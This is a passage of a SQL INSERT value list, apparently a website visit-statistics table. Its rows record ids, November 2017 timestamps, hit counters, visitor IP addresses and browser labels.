1,0,0,'51.255.65.79','other'),(173700,1509709190,1,1,0,0,'164.132.162.160','other'),(173701,1509709644,1,1,0,0,'217.182.132.72','other'),(173702,1509709868,2,2,0,0,'91.196.178.104','chrome'),(173703,1509709989,1,1,0,0,'217.182.132.193','other'),(173704,1509710338,1,1,0,0,'51.255.71.112','other'),(173705,1509710407,1,1,0,0,'51.255.65.95','other'),(173706,1509710498,1,1,0,0,'162.210.196.100','other'),(173707,1509711162,1,0,1,0,'66.249.79.156',''),(173708,1509711170,1,1,0,0,'66.249.79.156','chrome'),(173709,1509711188,1,1,0,0,'66.249.79.157','chrome'),(173710,1509711357,1,1,0,0,'217.182.132.79','other'),(173711,1509712086,1,1,0,0,'51.255.65.33','other'),(173712,1509712230,1,1,0,0,'51.255.65.78','other'),(173713,1509712636,1,1,0,0,'51.255.71.128','other'),(173714,1509712638,1,1,0,0,'51.255.65.77','other'),(173715,1509712688,1,1,0,0,'217.182.132.193','other'),(173716,1509712785,1,1,0,0,'217.182.132.57','other'),(173717,1509713154,1,1,0,0,'91.196.178.71','firefox'),(173718,1509713530,1,1,0,0,'157.55.39.206','other'),(173719,1509713545,72,72,0,0,'23.237.4.26','other'),(173720,1509713974,1,1,0,0,'51.255.65.25','other'),(173721,1509714027,1,1,0,0,'91.196.178.70','firefox'),(173722,1509714033,1,1,0,0,'217.69.133.10','other'),(173723,1509714196,1,1,0,0,'217.182.132.20','other'),(173724,1509714226,1,1,0,0,'51.255.65.92','other'),(173725,1509714420,1,1,0,0,'82.145.223.69','chrome'),(173726,1509714479,1,1,0,0,'51.255.65.4','other'),(173727,1509714596,1,1,0,0,'51.255.71.101','other'),(173728,1509714895,1,1,0,0,'134.249.147.14','chrome'),(173729,1509714909,1,1,0,0,'31.43.14.189','chrome'),(173730,1509715198,1,1,0,0,'137.74.207.109','other'),(173731,1509715227,1,1,0,0,'8.29.198.26','other'),(173732,1509715460,1,1,0,0,'66.249.79.155','chrome'),(173733,1509715695,1,1,0,0,'66.249.79.158','chrome'),(173734,1509715826,1,0,1,0,'66.249.76.107',''),(173735,1509715879,1,1,0,0,'217.182.132.90','other'),(173736,1509716284,1,1,0,0,'51.255.65.4','other'),(173737,1509716845,1,1,0,0,'37.9.113.56','other'),(173738,1509717123,1,0,1,0,'66.249.76.89',''),(173739,1509717207,1,1,0,0,'35.184.189.105','other'),(173740,1509718419,1,1,0,0,'178.92.85.231','chrome'),(173741,1509718736,2,2,0,0,'157.55.39.206','other'),(173742,1509718986,1,1,0,0,'51.255.65.47','other'),(173743,1509719096,1,0,1,0,'66.249.76.107',''),(173744,1509719391,1,1,0,0,'91.196.178.161','chrome'),(173745,1509719766,1,0,1,0,'66.249.79.156',''),(173746,1509719817,1,1,0,0,'82.145.222.69','chrome'),(173747,1509719818,2,1,1,0,'66.249.76.107',''),(173748,1509721158,1,1,0,0,'217.69.133.13','other'),(173749,1509721492,1,1,0,0,'217.182.132.35','other'),(173750,1509721576,1,1,0,0,'164.132.162.155','other'),(173751,1509721761,1,1,0,0,'217.182.132.96','other'),(173752,1509722014,1,1,0,0,'66.249.79.157','chrome'),(173753,1509722094,1,1,0,0,'217.182.132.59','other'),(173754,1509722095,1,1,0,0,'51.255.65.33','other'),(173755,1509722468,1,1,0,0,'217.182.132.190','other'),(173756,1509722527,1,1,0,0,'66.249.76.91','chrome'),(173757,1509722993,1,1,0,0,'164.132.162.156','other'),(173758,1509723219,1,1,0,0,'217.182.132.191','other'),(173759,1509723247,1,1,0,0,'51.255.65.29','other'),(173760,1509723762,1,1,0,0,'51.255.71.98','other'),(173761,1509724300,1,1,0,0,'217.182.132.86','other'),(173762,1509725097,1,1,0,0,'137.74.207.161','other'),(173763,1509725155,1,1,0,0,'51.255.65.89','other'),(173764,1509725211,1,1,0,0,'40.77.167.32','other'),(173765,1509725601,1,1,0,0,'51.255.65.23','other'),(173766,1509725926,1,1,0,0,'137.74.207.102','other'),(173767,1509726061,1,1,0,0,'8.29.198.26','other'),(173768,1509726110,1,0,1,0,'66.249.76.91',''),(173769,1509726138,1,0,1,0,'66.249.76.107',''),(173770,1509726360,1,1,0,0,'51.255.65.46','other'),(173771,1509726707,1,1,0,0,'51.255.71.111','other'),(173772,1509726862,1,1,0,0,'157.55.39.206','other'),(173773,1509726969,1,1,0,0,'51.255.71.110','other'),(173774,1509727365,1,0,1,0,'66.249.76.108',''),(173775,1509727439,1,1,0,0,'51.255.64.106','other'),(173776,1509727499,1,1,0,0,'137.74.207.119','other'),(173777,1509727994,1,1,0,0,'51.255.65.9','other'),(173778,1509728007,1,1,0,0,'217.182.132.147','other'),(173779,1509728107,1,1,0,0,'37.9.113.100','other'),(173780,1509728303,1,1,0,0,'217.182.132.68','other'),(173781,1509728594,1,1,0,0,'217.69.133.224','other'),(173782,1509728818,1,1,0,0,'51.255.65.73','other'),(173783,1509728980,1,1,0,0,'164.132.162.188','other'),(173784,1509729151,1,1,0,0,'217.182.132.240','other'),(173785,1509729277,1,1,0,0,'217.182.132.156','other'),(173786,1509730373,1,1,0,0,'217.182.132.155','other'),(173787,1509730526,1,1,0,0,'51.255.65.77','other'),(173788,1509730827,1,0,1,0,'66.249.79.157',''),(173789,1509730868,1,1,0,0,'164.132.164.180','other'),(173790,1509731131,1,1,0,0,'173.252.85.26','other'),(173791,1509731132,1,1,0,0,'91.196.178.136','chrome'),(173792,1509731511,1,1,0,0,'217.182.132.72','other'),(173793,1509731526,1,1,0,0,'5.45.207.58','other'),(173794,1509731850,1,1,0,0,'91.196.178.68','firefox'),(173795,1509731913,1,1,0,0,'51.255.65.15','other'),(173796,1509732785,1,1,0,0,'51.255.65.45','other'),(173797,1509732886,1,1,0,0,'46.161.9.55','chrome'),(173798,1509733865,1,1,0,0,'217.182.132.192','other'),(173799,1509734419,1,1,0,0,'51.255.65.60','other'),(173800,1509734672,1,1,0,0,'51.255.65.91','other'),(173801,1509735069,1,1,0,0,'37.73.219.122','chrome'),(173802,1509735153,1,1,0,0,'180.76.15.7','other'),(173803,1509735472,1,1,0,0,'176.31.231.10','other'),(173804,1509735683,1,1,0,0,'46.185.2.157','other'),(173805,1509735762,1,1,0,0,'217.182.132.5','other'),(173806,1509736132,1,0,1,0,'66.249.76.89',''),(173807,1509736227,1,1,0,0,'217.182.132.86','other'),(173808,1509736414,1,1,0,0,'82.145.221.249','chrome'),(173809,1509736476,1,1,0,0,'51.255.65.25','other'),(173810,1509736481,1,1,0,0,'217.182.132.70','other'),(173811,1509736665,1,0,1,0,'66.249.76.109',''),(173812,1509736782,1,1,0,0,'51.255.65.92','other'),(173813,1509736819,1,1,0,0,'91.196.178.104','chrome'),(173814,1509736832,1,1,0,0,'217.182.132.24','other'),(173815,1509736997,1,1,0,0,'217.182.132.19','other'),(173816,1509737050,1,1,0,0,'8.29.198.27','other'),(173817,1509737203,1,1,0,0,'51.255.65.65','other'),(173818,1509737223,1,1,0,0,'157.55.39.225','other'),(173819,1509737251,1,1,0,0,'217.182.132.148','other'),(173820,1509737585,1,1,0,0,'188.32.253.191','firefox'),(173821,1509737781,1,1,0,0,'176.31.231.10','other'),(173822,1509737873,1,1,0,0,'51.255.65.2','other'),(173823,1509737990,1,1,0,0,'151.80.27.116','other'),(173824,1509738316,1,1,0,0,'51.255.65.10','other'),(173825,1509738463,1,1,0,0,'91.196.178.129','chrome'),(173826,1509738505,1,1,0,0,'51.255.65.66','other'),(173827,1509738910,1,1,0,0,'217.182.132.6','other'),(173828,1509738919,1,1,0,0,'51.255.65.75','other'),(173829,1509738987,1,1,0,0,'51.255.71.126','other'),(173830,1509739371,1,1,0,0,'37.9.113.114','other'),(173831,1509739389,1,1,0,0,'51.255.65.19','other'),(173832,1509739501,1,1,0,0,'93.78.169.101','chrome'),(173833,1509740034,1,1,0,0,'217.182.132.179','other'),(173834,1509740096,1,1,0,0,'51.255.65.18','other'),(173835,1509740312,1,1,0,0,'37.9.113.114','other'),(173836,1509740316,1,1,0,0,'5.45.207.82','other'),(173837,1509740339,1,1,0,0,'54.165.59.7','other'),(173838,1509740411,1,1,0,0,'217.182.132.172','other'),(173839,1509740727,1,1,0,0,'5.45.207.49','other'),(173840,1509740903,1,1,0,0,'51.255.71.119','other'),(173841,1509741003,1,1,0,0,'87.250.224.46','other'),(173842,1509741274,2,2,0,0,'37.9.113.182','other'),(173843,1509741278,1,1,0,0,'217.182.132.58','other'),(173844,1509741769,1,1,0,0,'217.182.132.71','other'),(173845,1509741818,1,1,0,0,'188.166.59.193','chrome'),(173846,1509741931,1,1,0,0,'51.255.71.98','other'),(173847,1509741962,2,2,0,0,'87.250.224.46','other'),(173848,1509742244,1,1,0,0,'217.182.132.172','other'),(173849,1509742313,1,1,0,0,'217.182.132.81','other'),(173850,1509742410,1,1,0,0,'141.8.132.19','other'),(173851,1509742507,1,1,0,0,'51.255.65.65','other'),(173852,1509742758,1,1,0,0,'51.255.65.70','other'),(173853,1509743142,1,1,0,0,'217.182.132.240','other'),(173854,1509743861,1,1,0,0,'217.182.132.21','other'),(173855,1509744457,1,1,0,0,'141.8.142.201','other'),(173856,1509744597,1,0,1,0,'66.249.76.108',''),(173857,1509744660,1,1,0,0,'217.182.132.151','other'),(173858,1509744900,1,1,0,0,'164.132.162.153','other'),(173859,1509745213,1,1,0,0,'217.182.132.23','other'),(173860,1509745284,1,1,0,0,'51.255.65.24','other'),(173861,1509745514,1,1,0,0,'216.244.66.237','other'),(173862,1509745685,1,1,0,0,'51.255.65.86','other'),(173863,1509745727,1,1,0,0,'87.250.224.46','other'),(173864,1509745788,1,1,0,0,'5.45.207.83','other'),(173865,1509745981,1,1,0,0,'37.9.113.110','other'),(173866,1509746251,1,1,0,0,'51.255.65.34','other'),(173867,1509746414,1,1,0,0,'217.182.132.6','other'),(173868,1509746825,1,1,0,0,'51.255.65.48','other'),(173869,1509746879,1,1,0,0,'137.74.207.108','other'),(173870,1509746929,1,1,0,0,'217.182.132.63','other'),(173871,1509747802,1,1,0,0,'217.69.133.241','other'),(173872,1509747925,1,1,0,0,'8.29.198.26','other'),(173873,1509748692,1,1,0,0,'137.74.201.99','other'),(173874,1509748698,1,1,0,0,'217.182.132.63','other'),(173875,1509748883,1,1,0,0,'217.182.132.64','other'),(173876,1509749110,1,1,0,0,'217.182.132.78','other'),(173877,1509749537,1,1,0,0,'217.182.132.157','other'),(173878,1509749931,1,1,0,0,'217.182.132.81','other'),(173879,1509750059,1,1,0,0,'217.182.132.85','other'),(173880,1509750121,1,1,0,0,'217.182.132.66','other'),(173881,1509750399,1,1,0,0,'51.255.65.31','other'),(173882,1509750718,1,1,0,0,'74.115.214.143','other'),(173883,1509750722,1,1,0,0,'74.115.214.158','other'),(173884,1509750810,1,1,0,0,'178.154.171.88','other'),(173885,1509751077,1,1,0,0,'217.182.132.170','other'),(173886,1509751192,1,1,0,0,'66.249.65.156','chrome'),(173887,1509751432,3,0,3,0,'66.249.76.109',''),(173888,1509751521,1,1,0,0,'51.255.65.61','other'),(173889,1509751740,1,1,0,0,'51.255.65.28','other'),(173890,1509752165,1,1,0,0,'37.9.113.138','other'),(173891,1509752665,1,1,0,0,'137.74.207.110','other'),(173892,1509752746,1,1,0,0,'40.77.167.56','other'),(173893,1509753138,1,1,0,0,'51.255.65.52','other'),(173894,1509753368,1,1,0,0,'217.182.132.156','other'),(173895,1509753928,1,1,0,0,'157.55.39.206','other'),(173896,1509753961,1,1,0,0,'51.255.71.127','other'),(173897,1509754057,1,1,0,0,'217.182.132.17','other'),(173898,1509754705,1,1,0,0,'141.8.142.74','other'),(173899,1509754738,1,1,0,0,'51.255.65.44','other'),(173900,1509754806,1,1,0,0,'137.74.203.194','other'),(173901,1509755796,1,1,0,0,'217.182.132.62','other'),(173902,1509755877,1,1,0,0,'37.9.113.182','other'),(173903,1509755881,1,1,0,0,'87.250.224.46','other'),(173904,1509756093,1,1,0,0,'216.244.66.237','other'),(173905,1509756638,1,1,0,0,'217.182.132.188','other'),(173906,1509756639,1,1,0,0,'51.255.65.33','other'),(173907,1509756838,1,1,0,0,'217.182.132.63','other'),(173908,1509756865,1,1,0,0,'217.182.132.35','other'),(173909,1509757387,1,1,0,0,'51.255.65.65','other'),(173910,1509757529,1,1,0,0,'109.173.70.90','msie'),(173911,1509757666,1,1,0,0,'51.255.71.114','other'),(173912,1509757846,1,1,0,0,'51.255.65.17','other'),(173913,1509757948,1,1,0,0,'217.182.132.29','other'),(173914,1509758280,1,0,1,0,'66.249.76.107',''),(173915,1509758653,1,1,0,0,'164.132.162.158','other'),(173916,1509758761,1,1,0,0,'8.29.198.26','other'),(173917,1509758779,1,1,0,0,'66.249.76.109','chrome'),(173918,1509758821,1,1,0,0,'164.132.162.160','other'),(173919,1509758844,1,1,0,0,'51.255.65.6','other'),(173920,1509759056,1,1,0,0,'51.255.65.74','other'),(173921,1509759071,1,1,0,0,'217.182.132.28','other'),(173922,1509759192,1,1,0,0,'217.182.132.95','other'),(173923,1509759435,1,1,0,0,'51.255.65.36','other'),(173924,1509759535,1,1,0,0,'178.154.171.60','other'),(173925,1509759555,1,1,0,0,'51.255.65.52','other'),(173926,1509759840,1,0,1,0,'66.249.65.156',''),(173927,1509759905,2,2,0,0,'217.182.132.88','other'),(173928,1509760075,1,1,0,0,'217.182.132.53','other'),(173929,1509760699,1,1,0,0,'217.182.132.188','other'),(173930,1509760787,1,1,0,0,'137.74.207.119','other'),(173931,1509761011,1,1,0,0,'137.74.207.170','other'),(173932,1509761211,1,1,0,0,'51.255.65.45','other'),(173933,1509761398,1,1,0,0,'54.145.5.243','other'),(173934,1509761560,1,1,0,0,'217.182.132.31','other'),(173935,1509761620,1,1,0,0,'217.182.132.170','other'),(173936,1509761837,1,1,0,0,'66.249.76.107','chrome'),(173937,1509762207,1,1,0,0,'217.182.132.55','other'),(173938,1509762333,1,1,0,0,'95.221.55.233','firefox'),(173939,1509762925,1,1,0,0,'51.255.65.47','other'),(173940,1509763406,1,1,0,0,'217.182.132.66','other'),(173941,1509763583,1,1,0,0,'195.238.108.89','chrome'),(173942,1509763600,1,1,0,0,'217.182.132.21','other'),(173943,1509763973,1,1,0,0,'51.255.65.37','other'),(173944,1509764548,1,1,0,0,'51.255.65.41','other'),(173945,1509765023,1,1,0,0,'51.255.71.125','other'),(173946,1509765036,1,1,0,0,'74.115.214.137','other'),(173947,1509765038,1,1,0,0,'74.115.214.132','other'),(173948,1509765089,1,1,0,0,'51.255.65.22','other'),(173949,1509765984,1,1,0,0,'137.74.207.170','other'),(173950,1509766377,1,1,0,0,'217.182.132.152','other'),(173951,1509766876,1,1,0,0,'137.74.201.108','other'),(173952,1509767077,1,1,0,0,'51.255.65.14','other'),(173953,1509767196,1,1,0,0,'51.255.65.5','other'),(173954,1509767205,1,1,0,0,'217.69.134.174','other'),(173955,1509767386,1,1,0,0,'51.255.65.63','other'),(173956,1509767649,1,1,0,0,'178.154.171.88','other'),(173957,1509767652,1,1,0,0,'66.249.65.155','chrome'),(173958,1509768404,1,1,0,0,'51.255.65.16','other'),(173959,1509768414,1,1,0,0,'157.55.39.225','other'),(173960,1509768417,1,1,0,0,'95.220.119.5','msie'),(173961,1509768491,1,1,0,0,'51.255.65.37','other'),(173962,1509768796,1,1,0,0,'217.182.132.93','other'),(173963,1509769095,1,1,0,0,'217.182.132.181','other'),(173964,1509769580,1,1,0,0,'51.255.71.122','other'),(173965,1509769597,1,1,0,0,'8.29.198.25','other'),(173966,1509770153,2,2,0,0,'51.255.65.81','other'),(173967,1509770629,1,1,0,0,'217.182.132.152','other'),(173968,1509770663,1,1,0,0,'217.182.132.55','other'),(173969,1509771195,1,1,0,0,'164.132.162.153','other'),(173970,1509771369,1,1,0,0,'217.182.132.87','other'),(173971,1509771780,1,1,0,0,'141.8.142.74','other'),(173972,1509772151,1,1,0,0,'107.167.107.245','other'),(173973,1509772285,1,0,1,0,'66.249.65.156',''),(173974,1509772842,2,2,0,0,'82.193.100.107','other'),(173975,1509772875,1,1,0,0,'157.55.39.206','other'),(173976,1509772957,1,1,0,0,'216.244.66.237','other'),(173977,1509772993,1,1,0,0,'141.8.142.74','other'),(173978,1509773002,1,1,0,0,'137.74.207.108','other'),(173979,1509773109,1,1,0,0,'217.182.132.73','other'),(173980,1509773229,1,1,0,0,'51.255.65.7','other'),(173981,1509773570,1,1,0,0,'5.45.207.49','other'),(173982,1509773577,1,1,0,0,'217.69.134.177','other'),(173983,1509774014,1,1,0,0,'51.255.65.12','other'),(173984,1509774071,1,1,0,0,'51.255.71.100','other'),(173985,1509774174,1,1,0,0,'217.182.132.50','other'),(173986,1509774256,1,1,0,0,'178.154.171.88','other'),(173987,1509774903,1,1,0,0,'217.182.132.66','other'),(173988,1509775481,1,1,0,0,'137.74.201.100','other'),(173989,1509775759,1,1,0,0,'137.74.207.109','other'),(173990,1509776624,1,1,0,0,'51.255.65.28','other'),(173991,1509777047,1,1,0,0,'217.182.132.72','other'),(173992,1509777068,1,1,0,0,'157.55.39.206','other'),(173993,1509777235,1,1,0,0,'141.8.142.74','other'),(173994,1509777324,1,1,0,0,'217.182.132.156','other'),(173995,1509777505,1,1,0,0,'51.255.65.8','other'),(173996,1509778249,1,1,0,0,'217.182.132.20','other'),(173997,1509778342,1,1,0,0,'141.8.142.74','other'),(173998,1509779040,1,1,0,0,'217.182.132.73','other'),(173999,1509779068,1,1,0,0,'51.255.65.92','other'),(174000,1509779076,1,1,0,0,'217.182.132.23','other'),(174001,1509779253,1,1,0,0,'217.182.132.62','other'),(174002,1509779568,1,1,0,0,'216.244.66.237','other'),(174003,1509779667,1,1,0,0,'51.255.65.76','other'),(174004,1509779997,1,1,0,0,'217.182.132.71','other'),(174005,1509780382,1,1,0,0,'141.8.142.74','other'),(174006,1509780394,1,1,0,0,'51.255.65.3','other'),(174007,1509780437,1,1,0,0,'8.29.198.25','other'),(174008,1509781146,1,1,0,0,'51.255.65.94','other'),(174009,1509781264,1,1,0,0,'51.255.71.120','other'),(174010,1509781282,1,1,0,0,'94.156.144.191','firefox'),(174011,1509781739,1,1,0,0,'51.255.65.17','other'),(174012,1509781988,1,1,0,0,'51.255.65.80','other'),(174013,1509782339,1,1,0,0,'51.255.64.106','other'),(174014,1509783549,1,1,0,0,'217.182.132.57','other'),(174015,1509783943,1,1,0,0,'51.255.65.85','other'),(174016,1509784094,1,1,0,0,'40.77.167.32','other'),(174017,1509786414,1,1,0,0,'217.69.133.220','other'),(174018,1509786800,1,1,0,0,'137.74.207.116','other'),(174019,1509788035,1,1,0,0,'178.140.99.214','msie'),(174020,1509788756,1,1,0,0,'35.184.189.105','other'),(174021,1509789336,1,1,0,0,'51.255.71.133','other'),(174022,1509789470,1,1,0,0,'51.255.71.100','other'),(174023,1509790039,1,1,0,0,'51.255.65.70','other'),(174024,1509790697,1,1,0,0,'217.182.132.186','other'),(174025,1509790785,1,1,0,0,'51.255.71.116','other'),(174026,1509790916,1,1,0,0,'37.9.113.110','other'),(174027,1509791281,1,1,0,0,'8.29.198.27','other'),(174028,1509791530,2,0,2,0,'66.249.65.156',''),(174029,1509791542,6,0,6,0,'66.249.65.155',''),(174030,1509791546,7,0,7,0,'66.249.76.107',''),(174031,1509791570,3,2,1,0,'66.249.76.107',''),(174032,1509791619,1,1,0,0,'66.249.65.156','chrome'),(174033,1509791810,1,1,0,0,'217.182.132.64','other'),(174034,1509791849,1,1,0,0,'141.8.142.74','other'),(174035,1509792518,1,1,0,0,'217.182.132.14','other'),(174036,1509792647,1,1,0,0,'51.255.65.73','other'),(174037,1509792784,1,1,0,0,'217.69.133.217','other'),(174038,1509792830,1,1,0,0,'217.182.132.32','other'),(174039,1509792937,1,1,0,0,'51.255.65.57','other'),(174040,1509793009,1,1,0,0,'91.196.178.40','chrome'),(174041,1509793020,1,1,0,0,'51.255.65.76','other'),(174042,1509793222,1,1,0,0,'51.255.65.64','other'),(174043,1509793430,1,1,0,0,'217.182.132.27','other'),(174044,1509793902,1,1,0,0,'51.255.65.92','other'),(174045,1509793994,1,1,0,0,'51.255.65.46','other'),(174046,1509794501,1,1,0,0,'51.255.65.42','other'),(174047,1509795029,1,1,0,0,'51.255.71.122','other'),(174048,1509795141,1,1,0,0,'217.182.132.156','other'),(174049,1509795602,1,1,0,0,'217.182.132.36','other'),(174050,1509795678,1,1,0,0,'51.255.71.116','other'),(174051,1509795802,1,1,0,0,'51.255.65.19','other'),(174052,1509795829,1,1,0,0,'217.69.134.160','other'),(174053,1509795845,1,1,0,0,'217.182.132.155','other'),(174054,1509796153,1,1,0,0,'194.29.61.96','chrome'),(174055,1509796271,1,1,0,0,'66.249.65.156','chrome'),(174056,1509796359,2,2,0,0,'66.249.76.109','chrome'),(174057,1509796396,1,1,0,0,'180.76.15.147','other'),(174058,1509796412,1,1,0,0,'66.249.65.155','chrome'),(174059,1509796616,1,1,0,0,'213.180.203.40','other'),(174060,1509797091,1,1,0,0,'94.156.144.191','firefox'),(174061,1509797476,1,1,0,0,'188.146.99.70','chrome'),(174062,1509798005,1,1,0,0,'217.182.132.241','other'),(174063,1509798112,1,1,0,0,'217.182.132.24','other'),(174064,1509798477,1,1,0,0,'35.184.189.105','other'),(174065,1509798536,1,1,0,0,'51.255.65.9','other'),(174066,1509798893,1,1,0,0,'51.255.65.88','other'),(174067,1509799015,1,1,0,0,'217.182.132.69','other'),(174068,1509799215,1,1,0,0,'51.255.65.86','other'),(174069,1509799595,1,1,0,0,'217.69.133.215','other'),(174070,1509799835,1,1,0,0,'141.8.142.74','other'),(174071,1509799855,1,1,0,0,'51.255.71.117','other'),(174072,1509800202,1,1,0,0,'51.255.65.92','other'),(174073,1509800501,1,0,1,0,'66.249.76.107',''),(174074,1509800624,1,1,0,0,'91.209.11.236','other'),(174075,1509800861,1,1,0,0,'66.249.65.155','chrome'),(174076,1509801134,1,1,0,0,'51.255.65.76','other'),(174077,1509801392,1,1,0,0,'91.196.178.165','chrome'),(174078,1509801503,1,1,0,0,'157.55.39.206','other'),(174079,1509801990,1,1,0,0,'164.132.162.156','other'),(174080,1509802123,1,1,0,0,'8.29.198.25','other'),(174081,1509802137,1,1,0,0,'66.249.65.121','chrome'),(174082,1509802154,1,0,1,0,'66.249.76.89',''),(174083,1509802301,1,1,0,0,'164.132.162.159','other'),(174084,1509802715,1,1,0,0,'51.255.71.133','other'),(174085,1509803212,2,2,0,0,'40.77.167.56','other'),(174086,1509803549,1,1,0,0,'51.255.71.98','other'),(174087,1509803579,1,1,0,0,'164.132.162.187','other'),(174088,1509803713,1,1,0,0,'217.182.132.16','other'),(174089,1509803718,1,1,0,0,'157.55.39.206','other'),(174090,1509803888,1,1,0,0,'217.182.132.94','other'),(174091,1509803981,1,1,0,0,'40.77.167.32','other'),(174092,1509804433,1,1,0,0,'51.255.65.40','other'),(174093,1509804870,1,1,0,0,'46.161.9.55','chrome'),(174094,1509805461,1,1,0,0,'66.249.76.108','chrome'),(174095,1509805799,1,0,1,0,'66.249.76.109',''),(174096,1509805874,1,1,0,0,'137.74.207.102','other'),(174097,1509806120,1,1,0,0,'51.255.65.17','other'),(174098,1509806308,1,1,0,0,'217.182.132.23','other'),(174099,1509806442,3,3,0,0,'195.154.230.226','other'),(174100,1509806512,1,1,0,0,'217.182.132.78','other'),(174101,1509806589,1,1,0,0,'51.255.65.26','other'),(174102,1509806713,1,1,0,0,'217.182.132.14','other'),(174103,1509806769,1,1,0,0,'51.255.65.15','other'),(174104,1509806800,1,1,0,0,'217.182.132.185','other'),(174105,1509806883,2,2,0,0,'91.209.11.236','other'),(174106,1509807667,1,1,0,0,'40.77.167.56','other'),(174107,1509807679,1,1,0,0,'217.182.132.70','other'),(174108,1509808194,1,1,0,0,'178.92.85.231','chrome'),(174109,1509808516,1,1,0,0,'51.255.65.47','other'),(174110,1509808864,1,1,0,0,'51.255.65.85','other'),(174111,1509808960,1,1,0,0,'217.69.133.217','other'),(174112,1509809144,1,1,0,0,'216.244.66.237','other'),(174113,1509809497,1,1,0,0,'162.210.196.129','other'),(174114,1509809755,1,1,0,0,'178.154.171.55','other'),(174115,1509810537,1,1,0,0,'51.255.65.84','other'),(174116,1509810654,1,1,0,0,'178.154.171.88','other'),(174117,1509810843,1,1,0,0,'137.74.207.116','other'),(174118,1509810943,1,1,0,0,'5.228.17.93','msie'),(174119,1509811271,1,1,0,0,'178.92.154.145','firefox'),(174120,1509811478,1,1,0,0,'137.74.207.188','other'),(174121,1509811485,1,1,0,0,'141.8.142.74','other'),(174122,1509811535,1,1,0,0,'51.255.71.133','other'),(174123,1509811674,1,1,0,0,'37.9.113.182','other'),(174124,1509812002,1,1,0,0,'217.182.132.186','other'),(174125,1509812004,1,1,0,0,'51.255.65.97','other'),(174126,1509812068,1,1,0,0,'217.69.133.238','other'),(174127,1509812353,1,1,0,0,'37.9.113.114','other'),(174128,1509812369,1,1,0,0,'51.255.71.116','other'),(174129,1509812427,1,1,0,0,'178.154.171.4','other'),(174130,1509812554,1,1,0,0,'93.78.169.101','other'),(174131,1509812640,1,1,0,0,'217.69.136.209','other'),(174132,1509812702,1,1,0,0,'137.74.207.161','other'),(174133,1509812959,1,1,0,0,'8.29.198.26','other'),(174134,1509813309,1,1,0,0,'51.255.65.30','other'),(174135,1509813323,1,1,0,0,'51.255.65.75','other'),(174136,1509813431,1,1,0,0,'217.182.132.63','other'),(174137,1509813665,1,1,0,0,'137.74.207.102','other'),(174138,1509813765,1,1,0,0,'37.9.113.115','other'),(174139,1509813785,1,1,0,0,'87.250.224.46','other'),(174140,1509813915,1,1,0,0,'217.182.132.78','other'),(174141,1509813938,1,1,0,0,'141.8.132.19','other'),(174142,1509814266,1,1,0,0,'51.255.65.82','other'),(174143,1509814326,1,1,0,0,'217.182.132.97','other'),(174144,1509814394,1,1,0,0,'51.255.65.11','other'),(174145,1509815085,1,1,0,0,'217.182.132.179','other'),(174146,1509815260,1,1,0,0,'51.255.65.94','other'),(174147,1509815273,1,1,0,0,'66.249.76.91','chrome'),(174148,1509815676,1,1,0,0,'37.9.113.101','other'),(174149,1509817632,1,1,0,0,'217.182.132.180','other'),(174150,1509817660,1,1,0,0,'178.92.85.231','chrome'),(174151,1509817884,1,1,0,0,'178.154.171.88','other'),(174152,1509817990,1,1,0,0,'217.182.132.181','other'),(174153,1509818214,1,1,0,0,'51.255.65.16','other'),(174154,1509818644,1,1,0,0,'51.255.65.31','other'),(174155,1509819149,1,1,0,0,'51.255.71.112','other'),(174156,1509819299,1,1,0,0,'217.182.132.29','other'),(174157,1509820035,1,1,0,0,'217.182.132.61','other'),(174158,1509820384,1,1,0,0,'40.77.167.56','other'),(174159,1509820483,1,1,0,0,'217.182.132.19','other'),(174160,1509820572,1,1,0,0,'217.182.132.23','other'),(174161,1509822028,1,1,0,0,'178.154.200.32','other'),(174162,1509822199,1,1,0,0,'51.255.71.119','other'),(174163,1509822990,1,1,0,0,'164.132.162.154','other'),(174164,1509823082,1,1,0,0,'217.182.132.155','other'),(174165,1509823686,1,1,0,0,'51.255.65.88','other'),(174166,1509823801,1,1,0,0,'8.29.198.25','other'),(174167,1509824277,1,1,0,0,'51.255.65.6','other'),(174168,1509824582,1,1,0,0,'217.182.132.156','other'),(174169,1509825029,1,1,0,0,'216.244.66.237','other'),(174170,1509825119,1,1,0,0,'87.250.224.46','other'),(174171,1509825123,1,1,0,0,'37.9.113.182','other'),(174172,1509825194,1,1,0,0,'51.255.65.89','other'),(174173,1509825313,1,1,0,0,'217.182.132.21','other'),(174174,1509826977,1,1,0,0,'40.77.167.56','other'),(174175,1509827299,1,1,0,0,'137.74.207.108','other'),(174176,1509827607,1,1,0,0,'217.182.132.182','other'),(174177,1509828170,1,1,0,0,'51.255.65.22','other'),(174178,1509828373,1,1,0,0,'217.182.132.147','other'),(174179,1509828388,1,1,0,0,'51.255.71.118','other'),(174180,1509828413,1,1,0,0,'217.182.132.69','other'),(174181,1509828740,1,1,0,0,'51.255.65.81','other'),(174182,1509829006,1,1,0,0,'164.132.162.164','other'),(174183,1509829233,1,1,0,0,'54.165.59.7','other'),(174184,1509829730,1,1,0,0,'217.182.132.153','other'),(174185,1509830122,1,0,1,0,'66.249.76.91',''),(174186,1509830757,1,1,0,0,'137.74.207.102','other'),(174187,1509830831,1,1,0,0,'137.74.203.194','other'),(174188,1509830840,1,1,0,0,'51.255.71.115','other'),(174189,1509831285,1,1,0,0,'217.182.132.54','other'),(174190,1509831357,1,1,0,0,'217.182.132.7','other'),(174191,1509831391,1,1,0,0,'217.182.132.32','other'),(174192,1509831414,1,1,0,0,'217.69.136.208','other'),(174193,1509831565,1,1,0,0,'217.69.133.68','other'),(174194,1509831855,1,1,0,0,'217.182.132.92','other'),(174195,1509831871,1,1,0,0,'217.182.132.21','other'),(174196,1509831935,1,1,0,0,'157.55.39.206','other'),(174197,1509832288,1,1,0,0,'217.182.132.34','other'),(174198,1509832364,1,1,0,0,'217.182.132.182','other'),(174199,1509832560,1,1,0,0,'216.244.66.237','other'),(174200,1509832634,1,1,0,0,'51.255.65.38','other'),(174201,1509832676,1,1,0,0,'95.132.55.171','firefox'),(174202,1509832878,1,1,0,0,'51.255.65.5','other'),(174203,1509833039,1,1,0,0,'217.182.132.176','other'),(174204,1509833175,1,1,0,0,'164.132.162.154','other'),(174205,1509834433,1,1,0,0,'217.182.132.50','other'),(174206,1509834643,1,1,0,0,'8.29.198.25','other'),(174207,1509834759,1,1,0,0,'137.74.207.108','other'),(174208,1509835128,1,1,0,0,'217.69.133.23','other'),(174209,1509835183,1,1,0,0,'217.182.132.57','other'),(174210,1509835434,1,0,1,0,'66.249.66.157',''),(174211,1509835751,1,1,0,0,'51.255.65.45','other'),(174212,1509836040,1,1,0,0,'51.255.65.50','other'),(174213,1509836210,1,1,0,0,'217.182.132.74','o